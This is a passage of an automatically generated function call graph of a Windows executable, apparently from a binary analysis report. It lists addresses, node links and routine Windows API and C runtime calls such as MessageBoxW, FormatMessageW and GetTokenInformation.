7ff7f24f33ec GetModuleFileNameW 17072->17073 17073->16779 17073->16780 17075 7ff7f24f85f2 17074->17075 17076 7ff7f24f85df FindClose 17074->17076 17077 7ff7f24fb870 _log10_special 8 API calls 17075->17077 17076->17075 17078 7ff7f24f3442 17077->17078 17078->16785 17078->16786 17080 7ff7f24fbb70 17079->17080 17081 7ff7f24f29fc GetLastError 17080->17081 17082 7ff7f24f2a29 17081->17082 17103 7ff7f2503ef8 17082->17103 17087 7ff7f24fb870 _log10_special 8 API calls 17088 7ff7f24f2ae5 17087->17088 17088->16784 17090 7ff7f24f8660 GetFinalPathNameByHandleW CloseHandle 17089->17090 17091 7ff7f24f3458 17089->17091 17090->17091 17091->16793 17091->16794 17093 7ff7f24f26fa 17092->17093 17094 7ff7f2503ef8 48 API calls 17093->17094 17095 7ff7f24f2722 MessageBoxW 17094->17095 17096 7ff7f24fb870 _log10_special 8 API calls 17095->17096 17097 7ff7f24f274c 17096->17097 17097->16784 17099 7ff7f24f87b5 17098->17099 17100 7ff7f24f878a WideCharToMultiByte 17098->17100 17101 7ff7f24f87d2 WideCharToMultiByte 17099->17101 17102 7ff7f24f87cb __vcrt_freefls 17099->17102 17100->17099 17100->17102 17101->17102 17102->16792 17104 7ff7f2503f52 17103->17104 17105 7ff7f2503f77 17104->17105 17107 7ff7f2503fb3 17104->17107 17106 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17105->17106 17110 7ff7f2503fa1 17106->17110 17125 7ff7f25022b0 17107->17125 17109 7ff7f2504094 17112 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17109->17112 17111 7ff7f24fb870 _log10_special 8 API calls 17110->17111 17114 7ff7f24f2a54 FormatMessageW 17111->17114 17112->17110 17121 7ff7f24f2590 17114->17121 17115 7ff7f25040ba 17115->17109 17117 7ff7f25040c4 17115->17117 17116 7ff7f2504069 17118 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17116->17118 17120 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17117->17120 17118->17110 17119 7ff7f2504060 17119->17109 17119->17116 17120->17110 17122 7ff7f24f25b5 17121->17122 17123 7ff7f2503ef8 48 
API calls 17122->17123 17124 7ff7f24f25d8 MessageBoxW 17123->17124 17124->17087 17126 7ff7f25022ee 17125->17126 17127 7ff7f25022de 17125->17127 17128 7ff7f25022f7 17126->17128 17133 7ff7f2502325 17126->17133 17129 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17127->17129 17130 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17128->17130 17131 7ff7f250231d 17129->17131 17130->17131 17131->17109 17131->17115 17131->17116 17131->17119 17133->17127 17133->17131 17136 7ff7f2502cc4 17133->17136 17169 7ff7f2502710 17133->17169 17206 7ff7f2501ea0 17133->17206 17137 7ff7f2502d06 17136->17137 17138 7ff7f2502d77 17136->17138 17139 7ff7f2502da1 17137->17139 17140 7ff7f2502d0c 17137->17140 17141 7ff7f2502dd0 17138->17141 17142 7ff7f2502d7c 17138->17142 17229 7ff7f2501074 17139->17229 17143 7ff7f2502d11 17140->17143 17144 7ff7f2502d40 17140->17144 17146 7ff7f2502ddf 17141->17146 17148 7ff7f2502de7 17141->17148 17149 7ff7f2502dda 17141->17149 17145 7ff7f2502db1 17142->17145 17154 7ff7f2502d7e 17142->17154 17143->17148 17151 7ff7f2502d17 17143->17151 17144->17146 17144->17151 17236 7ff7f2500c64 17145->17236 17167 7ff7f2502e10 17146->17167 17247 7ff7f2501484 17146->17247 17243 7ff7f25039cc 17148->17243 17149->17139 17149->17146 17155 7ff7f2502d52 17151->17155 17157 7ff7f2502d20 17151->17157 17165 7ff7f2502d3b 17151->17165 17154->17157 17158 7ff7f2502d8d 17154->17158 17155->17167 17219 7ff7f25037b4 17155->17219 17157->17167 17209 7ff7f2503478 17157->17209 17158->17139 17160 7ff7f2502d92 17158->17160 17160->17167 17225 7ff7f2503878 17160->17225 17161 7ff7f24fb870 _log10_special 8 API calls 17162 7ff7f250310a 17161->17162 17162->17133 17165->17167 17168 7ff7f2502ffc 17165->17168 17254 7ff7f2503ae0 17165->17254 17167->17161 17168->17167 17260 7ff7f250dd18 17168->17260 17170 7ff7f2502734 17169->17170 17171 7ff7f250271e 17169->17171 17172 7ff7f2502774 17170->17172 17175 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17170->17175 17171->17172 17173 7ff7f2502d06 
17171->17173 17174 7ff7f2502d77 17171->17174 17172->17133 17176 7ff7f2502da1 17173->17176 17177 7ff7f2502d0c 17173->17177 17178 7ff7f2502dd0 17174->17178 17179 7ff7f2502d7c 17174->17179 17175->17172 17184 7ff7f2501074 38 API calls 17176->17184 17180 7ff7f2502d11 17177->17180 17181 7ff7f2502d40 17177->17181 17185 7ff7f2502de7 17178->17185 17187 7ff7f2502dda 17178->17187 17191 7ff7f2502ddf 17178->17191 17182 7ff7f2502db1 17179->17182 17183 7ff7f2502d7e 17179->17183 17180->17185 17188 7ff7f2502d17 17180->17188 17181->17188 17181->17191 17189 7ff7f2500c64 38 API calls 17182->17189 17186 7ff7f2502d20 17183->17186 17195 7ff7f2502d8d 17183->17195 17201 7ff7f2502d3b 17184->17201 17192 7ff7f25039cc 45 API calls 17185->17192 17190 7ff7f2503478 47 API calls 17186->17190 17205 7ff7f2502e10 17186->17205 17187->17176 17187->17191 17188->17186 17193 7ff7f2502d52 17188->17193 17188->17201 17189->17201 17190->17201 17194 7ff7f2501484 38 API calls 17191->17194 17191->17205 17192->17201 17196 7ff7f25037b4 46 API calls 17193->17196 17193->17205 17194->17201 17195->17176 17197 7ff7f2502d92 17195->17197 17196->17201 17200 7ff7f2503878 37 API calls 17197->17200 17197->17205 17198 7ff7f24fb870 _log10_special 8 API calls 17199 7ff7f250310a 17198->17199 17199->17133 17200->17201 17202 7ff7f2503ae0 45 API calls 17201->17202 17204 7ff7f2502ffc 17201->17204 17201->17205 17202->17204 17203 7ff7f250dd18 46 API calls 17203->17204 17204->17203 17204->17205 17205->17198 17426 7ff7f25002e8 17206->17426 17210 7ff7f250349e 17209->17210 17272 7ff7f24ffea0 17210->17272 17215 7ff7f2503ae0 45 API calls 17216 7ff7f25035e3 17215->17216 17217 7ff7f2503ae0 45 API calls 17216->17217 17218 7ff7f2503671 17216->17218 17217->17218 17218->17165 17220 7ff7f25037e9 17219->17220 17221 7ff7f250382e 17220->17221 17222 7ff7f2503807 17220->17222 17223 7ff7f2503ae0 45 API calls 17220->17223 17221->17165 17224 7ff7f250dd18 46 API calls 17222->17224 17223->17222 17224->17221 17227 7ff7f2503899 17225->17227 17226 7ff7f2509b24 
_invalid_parameter_noinfo 37 API calls 17228 7ff7f25038ca 17226->17228 17227->17226 17227->17228 17228->17165 17230 7ff7f25010a7 17229->17230 17231 7ff7f25010d6 17230->17231 17233 7ff7f2501193 17230->17233 17235 7ff7f2501113 17231->17235 17399 7ff7f24fff48 17231->17399 17234 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17233->17234 17234->17235 17235->17165 17237 7ff7f2500c97 17236->17237 17238 7ff7f2500cc6 17237->17238 17240 7ff7f2500d83 17237->17240 17239 7ff7f24fff48 12 API calls 17238->17239 17242 7ff7f2500d03 17238->17242 17239->17242 17241 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17240->17241 17241->17242 17242->17165 17244 7ff7f2503a0f 17243->17244 17246 7ff7f2503a13 __crtLCMapStringW 17244->17246 17407 7ff7f2503a68 17244->17407 17246->17165 17248 7ff7f25014b7 17247->17248 17249 7ff7f25014e6 17248->17249 17251 7ff7f25015a3 17248->17251 17250 7ff7f24fff48 12 API calls 17249->17250 17253 7ff7f2501523 17249->17253 17250->17253 17252 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17251->17252 17252->17253 17253->17165 17255 7ff7f2503af7 17254->17255 17411 7ff7f250ccc8 17255->17411 17261 7ff7f250dd49 17260->17261 17270 7ff7f250dd57 17260->17270 17262 7ff7f250dd77 17261->17262 17265 7ff7f2503ae0 45 API calls 17261->17265 17261->17270 17263 7ff7f250dd88 17262->17263 17264 7ff7f250ddaf 17262->17264 17419 7ff7f250f3b0 17263->17419 17267 7ff7f250ddd9 17264->17267 17268 7ff7f250de3a 17264->17268 17264->17270 17265->17262 17267->17270 17271 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 17267->17271 17269 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 17268->17269 17269->17270 17270->17168 17271->17270 17273 7ff7f24ffed7 17272->17273 17274 7ff7f24ffec6 17272->17274 17273->17274 17275 7ff7f250c90c _fread_nolock 12 API calls 17273->17275 17280 7ff7f250d880 17274->17280 17276 7ff7f24fff04 17275->17276 17277 7ff7f24fff18 17276->17277 17278 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17276->17278 17279 7ff7f2509c58 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17277->17279 17278->17277 17279->17274 17281 7ff7f250d89d 17280->17281 17282 7ff7f250d8d0 17280->17282 17283 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17281->17283 17282->17281 17284 7ff7f250d902 17282->17284 17293 7ff7f25035c1 17283->17293 17289 7ff7f250da15 17284->17289 17297 7ff7f250d94a 17284->17297 17285 7ff7f250db07 17326 7ff7f250cd6c 17285->17326 17287 7ff7f250dacd 17319 7ff7f250d104 17287->17319 17289->17285 17289->17287 17290 7ff7f250da9c 17289->17290 17292 7ff7f250da5f 17289->17292 17295 7ff7f250da55 17289->17295 17312 7ff7f250d3e4 17290->17312 17302 7ff7f250d614 17292->17302 17293->17215 17293->17216 17295->17287 17296 7ff7f250da5a 17295->17296 17296->17290 17296->17292 17297->17293 17298 7ff7f25097b4 __std_exception_copy 37 API calls 17297->17298 17299 7ff7f250da02 17298->17299 17299->17293 17300 7ff7f2509c10 _isindst 17 API calls 17299->17300 17301 7ff7f250db64 17300->17301 17335 7ff7f25133bc 17302->17335 17306 7ff7f250d711 17388 7ff7f250d200 17306->17388 17307 7ff7f250d6bc 17307->17306 17309 7ff7f250d6dc 17307->17309 17311 7ff7f250d6c0 17307->17311 17384 7ff7f250d4bc 17309->17384 17311->17293 17313 7ff7f25133bc 38 API calls 17312->17313 17314 7ff7f250d42e 17313->17314 17315 7ff7f2512e04 37 API calls 17314->17315 17316 7ff7f250d47e 17315->17316 17317 7ff7f250d482 17316->17317 17318 7ff7f250d4bc 45 API calls 17316->17318 17317->17293 17318->17317 17320 7ff7f25133bc 38 API calls 17319->17320 17321 7ff7f250d14f 17320->17321 17322 7ff7f2512e04 37 API calls 17321->17322 17324 7ff7f250d1a7 17322->17324 17323 7ff7f250d1ab 17323->17293 17324->17323 17325 7ff7f250d200 45 API calls 17324->17325 17325->17323 17327 7ff7f250cdb1 17326->17327 17328 7ff7f250cde4 17326->17328 17330 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17327->17330 17329 7ff7f250cdfc 17328->17329 17333 7ff7f250ce7d 17328->17333 17331 7ff7f250d104 46 API calls 17329->17331 17332 7ff7f250cddd memcpy_s 17330->17332 
17331->17332 17332->17293 17333->17332 17334 7ff7f2503ae0 45 API calls 17333->17334 17334->17332 17336 7ff7f251340f fegetenv 17335->17336 17337 7ff7f251713c 37 API calls 17336->17337 17341 7ff7f2513462 17337->17341 17338 7ff7f251348f 17343 7ff7f25097b4 __std_exception_copy 37 API calls 17338->17343 17339 7ff7f2513552 17340 7ff7f251713c 37 API calls 17339->17340 17342 7ff7f251357c 17340->17342 17341->17339 17345 7ff7f251347d 17341->17345 17346 7ff7f251352c 17341->17346 17347 7ff7f251713c 37 API calls 17342->17347 17344 7ff7f251350d 17343->17344 17348 7ff7f2514634 17344->17348 17354 7ff7f2513515 17344->17354 17345->17338 17345->17339 17349 7ff7f25097b4 __std_exception_copy 37 API calls 17346->17349 17350 7ff7f251358d 17347->17350 17351 7ff7f2509c10 _isindst 17 API calls 17348->17351 17349->17344 17352 7ff7f2517330 20 API calls 17350->17352 17353 7ff7f2514649 17351->17353 17362 7ff7f25135f6 memcpy_s 17352->17362 17355 7ff7f24fb870 _log10_special 8 API calls 17354->17355 17356 7ff7f250d661 17355->17356 17380 7ff7f2512e04 17356->17380 17357 7ff7f251399f memcpy_s 17358 7ff7f2513637 memcpy_s 17375 7ff7f2513f7b memcpy_s 17358->17375 17376 7ff7f2513a93 memcpy_s 17358->17376 17359 7ff7f2513cdf 17360 7ff7f2512f20 37 API calls 17359->17360 17366 7ff7f25143f7 17360->17366 17361 7ff7f2513c8b 17361->17359 17363 7ff7f251464c memcpy_s 37 API calls 17361->17363 17362->17357 17362->17358 17364 7ff7f25043f4 memcpy_s 11 API calls 17362->17364 17363->17359 17365 7ff7f2513a70 17364->17365 17367 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17365->17367 17369 7ff7f251464c memcpy_s 37 API calls 17366->17369 17377 7ff7f2514452 17366->17377 17367->17358 17368 7ff7f25145d8 17371 7ff7f251713c 37 API calls 17368->17371 17369->17377 17370 7ff7f25043f4 11 API calls memcpy_s 17370->17375 17371->17354 17372 7ff7f25043f4 11 API calls memcpy_s 17372->17376 17373 7ff7f2512f20 37 API calls 17373->17377 17374 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 17374->17376 17375->17359 
17375->17361 17375->17370 17378 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 17375->17378 17376->17361 17376->17372 17376->17374 17377->17368 17377->17373 17379 7ff7f251464c memcpy_s 37 API calls 17377->17379 17378->17375 17379->17377 17381 7ff7f2512e23 17380->17381 17382 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17381->17382 17383 7ff7f2512e4e memcpy_s 17381->17383 17382->17383 17383->17307 17385 7ff7f250d4e8 memcpy_s 17384->17385 17386 7ff7f2503ae0 45 API calls 17385->17386 17387 7ff7f250d5a2 memcpy_s 17385->17387 17386->17387 17387->17311 17389 7ff7f250d23b 17388->17389 17393 7ff7f250d288 memcpy_s 17388->17393 17390 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17389->17390 17391 7ff7f250d267 17390->17391 17391->17311 17392 7ff7f250d2f3 17394 7ff7f25097b4 __std_exception_copy 37 API calls 17392->17394 17393->17392 17395 7ff7f2503ae0 45 API calls 17393->17395 17398 7ff7f250d335 memcpy_s 17394->17398 17395->17392 17396 7ff7f2509c10 _isindst 17 API calls 17397 7ff7f250d3e0 17396->17397 17398->17396 17400 7ff7f24fff7f 17399->17400 17401 7ff7f24fff6e 17399->17401 17400->17401 17402 7ff7f250c90c _fread_nolock 12 API calls 17400->17402 17401->17235 17403 7ff7f24fffb0 17402->17403 17404 7ff7f24fffc4 17403->17404 17406 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17403->17406 17405 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17404->17405 17405->17401 17406->17404 17408 7ff7f2503a86 17407->17408 17409 7ff7f2503a8e 17407->17409 17410 7ff7f2503ae0 45 API calls 17408->17410 17409->17246 17410->17409 17412 7ff7f250cce1 17411->17412 17414 7ff7f2503b1f 17411->17414 17413 7ff7f2512614 45 API calls 17412->17413 17412->17414 17413->17414 17415 7ff7f250cd34 17414->17415 17416 7ff7f250cd4d 17415->17416 17417 7ff7f2503b2f 17415->17417 17416->17417 17418 7ff7f2511960 45 API calls 17416->17418 17417->17168 17418->17417 17422 7ff7f2516098 17419->17422 17425 7ff7f25160fc 17422->17425 17423 7ff7f24fb870 
_log10_special 8 API calls 17424 7ff7f250f3cd 17423->17424 17424->17270 17425->17423 17427 7ff7f250032f 17426->17427 17428 7ff7f250031d 17426->17428 17431 7ff7f250033d 17427->17431 17436 7ff7f2500379 17427->17436 17429 7ff7f25043f4 memcpy_s 11 API calls 17428->17429 17430 7ff7f2500322 17429->17430 17432 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17430->17432 17433 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17431->17433 17434 7ff7f250032d 17432->17434 17433->17434 17434->17133 17435 7ff7f25006f5 17435->17434 17437 7ff7f25043f4 memcpy_s 11 API calls 17435->17437 17436->17435 17438 7ff7f25043f4 memcpy_s 11 API calls 17436->17438 17439 7ff7f2500989 17437->17439 17440 7ff7f25006ea 17438->17440 17441 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17439->17441 17442 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17440->17442 17441->17434 17442->17435 17444 7ff7f24ffa24 17443->17444 17473 7ff7f24ff784 17444->17473 17446 7ff7f24ffa3d 17446->16808 17485 7ff7f24ff6dc 17447->17485 17451 7ff7f24f277c 17450->17451 17452 7ff7f25043f4 memcpy_s 11 API calls 17451->17452 17453 7ff7f24f2799 17452->17453 17499 7ff7f2503ca4 17453->17499 17458 7ff7f24f1bf0 49 API calls 17459 7ff7f24f2807 17458->17459 17460 7ff7f24f86b0 2 API calls 17459->17460 17461 7ff7f24f281f 17460->17461 17462 7ff7f24f2843 MessageBoxA 17461->17462 17463 7ff7f24f282c MessageBoxW 17461->17463 17464 7ff7f24f2855 17462->17464 17463->17464 17465 7ff7f24fb870 _log10_special 8 API calls 17464->17465 17466 7ff7f24f2865 17465->17466 17466->16837 17468 7ff7f24ff439 17467->17468 17472 7ff7f24f1b06 17467->17472 17469 7ff7f25043f4 memcpy_s 11 API calls 17468->17469 17470 7ff7f24ff43e 17469->17470 17471 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17470->17471 17471->17472 17472->16836 17472->16837 17474 7ff7f24ff7ee 17473->17474 17475 7ff7f24ff7ae 17473->17475 17474->17475 17477 7ff7f24ff7fa 17474->17477 17476 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17475->17476 17483 7ff7f24ff7d5 
17476->17483 17484 7ff7f250477c EnterCriticalSection 17477->17484 17483->17446 17486 7ff7f24ff706 17485->17486 17487 7ff7f24f19b9 17485->17487 17486->17487 17488 7ff7f24ff715 memcpy_s 17486->17488 17489 7ff7f24ff752 17486->17489 17487->16814 17487->16815 17491 7ff7f25043f4 memcpy_s 11 API calls 17488->17491 17498 7ff7f250477c EnterCriticalSection 17489->17498 17493 7ff7f24ff72a 17491->17493 17495 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17493->17495 17495->17487 17503 7ff7f2503cfe 17499->17503 17500 7ff7f2503d23 17501 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17500->17501 17505 7ff7f2503d4d 17501->17505 17502 7ff7f2503d5f 17529 7ff7f2501f30 17502->17529 17503->17500 17503->17502 17508 7ff7f24fb870 _log10_special 8 API calls 17505->17508 17506 7ff7f2503e3c 17507 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17506->17507 17507->17505 17509 7ff7f24f27d8 17508->17509 17517 7ff7f2504480 17509->17517 17511 7ff7f2503e11 17513 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17511->17513 17512 7ff7f2503e60 17512->17506 17515 7ff7f2503e6a 17512->17515 17513->17505 17514 7ff7f2503e08 17514->17506 17514->17511 17516 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17515->17516 17516->17505 17518 7ff7f250a5d8 memcpy_s 11 API calls 17517->17518 17519 7ff7f2504497 17518->17519 17520 7ff7f24f27df 17519->17520 17521 7ff7f250dea8 memcpy_s 11 API calls 17519->17521 17524 7ff7f25044d7 17519->17524 17520->17458 17522 7ff7f25044cc 17521->17522 17523 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17522->17523 17523->17524 17524->17520 17664 7ff7f250df30 17524->17664 17527 7ff7f2509c10 _isindst 17 API calls 17528 7ff7f250451c 17527->17528 17530 7ff7f2501f6e 17529->17530 17531 7ff7f2501f5e 17529->17531 17532 7ff7f2501f77 17530->17532 17541 7ff7f2501fa5 17530->17541 17533 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17531->17533 17534 7ff7f2509b24 
_invalid_parameter_noinfo 37 API calls 17532->17534 17535 7ff7f2501f9d 17533->17535 17534->17535 17535->17506 17535->17511 17535->17512 17535->17514 17536 7ff7f2503ae0 45 API calls 17536->17541 17538 7ff7f2502254 17540 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17538->17540 17540->17531 17541->17531 17541->17535 17541->17536 17541->17538 17543 7ff7f25028c0 17541->17543 17569 7ff7f2502588 17541->17569 17599 7ff7f2501e10 17541->17599 17544 7ff7f2502975 17543->17544 17545 7ff7f2502902 17543->17545 17548 7ff7f25029cf 17544->17548 17549 7ff7f250297a 17544->17549 17546 7ff7f250299f 17545->17546 17547 7ff7f2502908 17545->17547 17616 7ff7f2500e70 17546->17616 17555 7ff7f250290d 17547->17555 17558 7ff7f25029de 17547->17558 17548->17546 17548->17558 17560 7ff7f2502938 17548->17560 17550 7ff7f25029af 17549->17550 17551 7ff7f250297c 17549->17551 17623 7ff7f2500a60 17550->17623 17553 7ff7f250291d 17551->17553 17557 7ff7f250298b 17551->17557 17568 7ff7f2502a0d 17553->17568 17602 7ff7f2503224 17553->17602 17555->17553 17559 7ff7f2502950 17555->17559 17555->17560 17557->17546 17562 7ff7f2502990 17557->17562 17558->17568 17630 7ff7f2501280 17558->17630 17559->17568 17612 7ff7f25036e0 17559->17612 17560->17568 17637 7ff7f250db68 17560->17637 17565 7ff7f2503878 37 API calls 17562->17565 17562->17568 17564 7ff7f24fb870 _log10_special 8 API calls 17566 7ff7f2502ca3 17564->17566 17565->17560 17566->17541 17568->17564 17570 7ff7f2502593 17569->17570 17571 7ff7f25025a9 17569->17571 17572 7ff7f25025e7 17570->17572 17573 7ff7f2502975 17570->17573 17574 7ff7f2502902 17570->17574 17571->17572 17575 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17571->17575 17572->17541 17578 7ff7f25029cf 17573->17578 17579 7ff7f250297a 17573->17579 17576 7ff7f250299f 17574->17576 17577 7ff7f2502908 17574->17577 17575->17572 17582 7ff7f2500e70 38 API calls 17576->17582 17586 7ff7f250290d 17577->17586 17589 7ff7f25029de 17577->17589 17578->17576 17578->17589 17597 7ff7f2502938 17578->17597 17580 
7ff7f25029af 17579->17580 17581 7ff7f250297c 17579->17581 17584 7ff7f2500a60 38 API calls 17580->17584 17583 7ff7f250291d 17581->17583 17587 7ff7f250298b 17581->17587 17582->17597 17585 7ff7f2503224 47 API calls 17583->17585 17598 7ff7f2502a0d 17583->17598 17584->17597 17585->17597 17586->17583 17588 7ff7f2502950 17586->17588 17586->17597 17587->17576 17591 7ff7f2502990 17587->17591 17592 7ff7f25036e0 47 API calls 17588->17592 17588->17598 17590 7ff7f2501280 38 API calls 17589->17590 17589->17598 17590->17597 17594 7ff7f2503878 37 API calls 17591->17594 17591->17598 17592->17597 17593 7ff7f24fb870 _log10_special 8 API calls 17595 7ff7f2502ca3 17593->17595 17594->17597 17595->17541 17596 7ff7f250db68 47 API calls 17596->17597 17597->17596 17597->17598 17598->17593 17647 7ff7f2500034 17599->17647 17603 7ff7f2503246 17602->17603 17604 7ff7f24ffea0 12 API calls 17603->17604 17605 7ff7f250328e 17604->17605 17606 7ff7f250d880 46 API calls 17605->17606 17607 7ff7f2503361 17606->17607 17608 7ff7f2503383 17607->17608 17609 7ff7f2503ae0 45 API calls 17607->17609 17610 7ff7f2503ae0 45 API calls 17608->17610 17611 7ff7f250340c 17608->17611 17609->17608 17610->17611 17611->17560 17613 7ff7f25036f8 17612->17613 17615 7ff7f2503760 17612->17615 17614 7ff7f250db68 47 API calls 17613->17614 17613->17615 17614->17615 17615->17560 17618 7ff7f2500ea3 17616->17618 17617 7ff7f2500ed2 17619 7ff7f24ffea0 12 API calls 17617->17619 17622 7ff7f2500f0f 17617->17622 17618->17617 17620 7ff7f2500f8f 17618->17620 17619->17622 17621 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17620->17621 17621->17622 17622->17560 17624 7ff7f2500a93 17623->17624 17625 7ff7f2500ac2 17624->17625 17627 7ff7f2500b7f 17624->17627 17626 7ff7f24ffea0 12 API calls 17625->17626 17629 7ff7f2500aff 17625->17629 17626->17629 17628 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17627->17628 17628->17629 17629->17560 17631 7ff7f25012b3 17630->17631 17632 7ff7f25012e2 17631->17632 17635 7ff7f250139f 17631->17635 
17633 7ff7f250131f 17632->17633 17634 7ff7f24ffea0 12 API calls 17632->17634 17633->17560 17634->17633 17636 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17635->17636 17636->17633 17638 7ff7f250db90 17637->17638 17639 7ff7f250dbd5 17638->17639 17640 7ff7f2503ae0 45 API calls 17638->17640 17642 7ff7f250db95 memcpy_s 17638->17642 17646 7ff7f250dbbe memcpy_s 17638->17646 17639->17642 17643 7ff7f250faf8 WideCharToMultiByte 17639->17643 17639->17646 17640->17639 17641 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17641->17642 17642->17560 17644 7ff7f250dcb1 17643->17644 17644->17642 17645 7ff7f250dcc6 GetLastError 17644->17645 17645->17642 17645->17646 17646->17641 17646->17642 17648 7ff7f2500073 17647->17648 17649 7ff7f2500061 17647->17649 17651 7ff7f2500080 17648->17651 17655 7ff7f25000bd 17648->17655 17650 7ff7f25043f4 memcpy_s 11 API calls 17649->17650 17652 7ff7f2500066 17650->17652 17653 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17651->17653 17654 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17652->17654 17659 7ff7f2500071 17653->17659 17654->17659 17656 7ff7f2500166 17655->17656 17657 7ff7f25043f4 memcpy_s 11 API calls 17655->17657 17658 7ff7f25043f4 memcpy_s 11 API calls 17656->17658 17656->17659 17660 7ff7f250015b 17657->17660 17661 7ff7f2500210 17658->17661 17659->17541 17662 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17660->17662 17663 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17661->17663 17662->17656 17663->17659 17669 7ff7f250df4d 17664->17669 17665 7ff7f250df52 17666 7ff7f25044fd 17665->17666 17667 7ff7f25043f4 memcpy_s 11 API calls 17665->17667 17666->17520 17666->17527 17668 7ff7f250df5c 17667->17668 17670 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17668->17670 17669->17665 17669->17666 17671 7ff7f250df9c 17669->17671 17670->17666 17671->17666 17672 7ff7f25043f4 memcpy_s 11 API calls 17671->17672 17672->17668 17674 7ff7f2507555 17673->17674 17675 7ff7f2507568 17673->17675 17676 7ff7f25043f4 
memcpy_s 11 API calls 17674->17676 17683 7ff7f25071cc 17675->17683 17678 7ff7f250755a 17676->17678 17680 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17678->17680 17682 7ff7f2507566 17680->17682 17682->16855 17690 7ff7f250f5e8 EnterCriticalSection 17683->17690 17692 7ff7f24f7c13 __vcrt_freefls 17691->17692 17693 7ff7f24f7b91 GetTokenInformation 17691->17693 17695 7ff7f24f7c26 CloseHandle 17692->17695 17696 7ff7f24f7c2c 17692->17696 17694 7ff7f24f7bb2 GetLastError 17693->17694 17697 7ff7f24f7bbd 17693->17697 17694->17692 17694->17697 17695->17696 17696->16864 17697->17692 17698 7ff7f24f7bd9 GetTokenInformation 17697->17698 17698->17692 17699 7ff7f24f7bfc 17698->17699 17699->17692 17700 7ff7f24f7c06 ConvertSidToStringSidW 17699->17700 17700->17692 17702 7ff7f24f297a 17701->17702 17703 7ff7f2503ef8 48 API calls 17702->17703 17704 7ff7f24f29a2 MessageBoxW 17703->17704 17705 7ff7f24fb870 _log10_special 8 API calls 17704->17705 17706 7ff7f24f29cc 17705->17706 17706->16874 17708 7ff7f24f2555 17707->17708 17709 7ff7f2503ef8 48 API calls 17708->17709 17715 7ff7f24f77dc 17714->17715 17981 7ff7f24f3f70 108 API calls 17980->17981 17982 7ff7f24f1463 17981->17982 17983 7ff7f24f146b 17982->17983 17984 7ff7f24f148c 17982->17984 17985 7ff7f24f25f0 53 API calls 17983->17985 17986 7ff7f24ff9f4 73 API calls 17984->17986 17988 7ff7f24f147b 17985->17988 17987 7ff7f24f14a1 17986->17987 17989 7ff7f24f14a5 17987->17989 17990 7ff7f24f14c1 17987->17990 17988->16924 17991 7ff7f24f2760 53 API calls 17989->17991 17992 7ff7f24f14f1 17990->17992 17993 7ff7f24f14d1 17990->17993 18002 7ff7f24f14bc __vcrt_freefls 17991->18002 17996 7ff7f24f14f7 17992->17996 17999 7ff7f24f150a 17992->17999 17994 7ff7f24f2760 53 API calls 17993->17994 17994->18002 17995 7ff7f24ff36c 74 API calls 17997 7ff7f24f1584 17995->17997 18004 7ff7f24f11f0 17996->18004 17997->16924 18000 7ff7f24ff6bc _fread_nolock 53 API calls 17999->18000 18001 7ff7f24f1596 17999->18001 17999->18002 18000->17999 18003 7ff7f24f2760 53 API 
